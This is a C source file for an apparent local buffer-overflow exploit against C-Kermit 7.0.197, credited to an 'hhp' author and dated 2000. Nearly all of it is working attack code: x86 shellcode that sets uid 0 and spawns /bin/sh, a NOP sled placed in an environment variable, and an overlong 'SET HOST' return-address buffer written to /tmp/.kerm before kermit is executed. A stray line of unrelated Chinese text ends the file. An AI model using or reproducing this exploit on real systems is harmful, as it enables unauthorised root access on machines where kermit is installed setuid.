/* * C-Kermit local exploit. * Versions: 7.0.197 (Maybe others). * Available at: www.columbia.edu/kermit/ * * By: Cody Tubbs (loophole of hhp). * shouts to v9. :), *icesk, rpc, tgb, * syscon, houston peeps, meta`, duke, * ism, blkforge, sk8, and #hhp. * * Date: 9/19/2000. * Web: www.hhp-programming.net * Mail: pigspigs@yahoo.com * * Tested on slack7. * non s*id by default on linux. * [suid on Olivetti X/OS R2.3, 3.x] * * .. ribbit.. . ribbit.. . ribbit.. SPLAT!. *******************************************/ #include #define OFFSET -5000 // Tested on slack7. #define NOP 0x90 #define TMP "/tmp/.kerm" #define DBUF 1200 static char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" "\xe8\xdc\xff\xff\xff/bin/sh\x69"; long get_sp(void){ __asm__("movl %esp,%eax"); } main(int argc, char *argv[]){ char eipeip[DBUF], buffer[4096]; int i, offset; FILE *ribbit; long address; if(argc > 1){ offset = atoi(argv[1]); }else{ offset = OFFSET; } address = get_sp() - offset; for(i = 0 ; i < DBUF ; i += 4){ *(long *)&eipeip[i] = address; } for( i = 0 ; i < (4096 - strlen(shellcode) - strlen(eipeip)) ; i++){ buffer[i] = NOP; } memcpy(buffer + i, shellcode, strlen(shellcode)); memcpy(buffer, "RIBBIT=", 7); // Using env var due to command putenv(buffer); // line shellcode char(hotkey) // truncate problems. fprintf(stderr, "Return address %#x, offset: %d.\n", address, offset); unlink(TMP); ribbit = fopen(TMP, "w"); fprintf(ribbit, "SET HOST %s\n", eipeip); fclose(ribbit); execlp("/usr/local/bin/kermit", "kermit", TMP, 0); }

亚洲欧美在线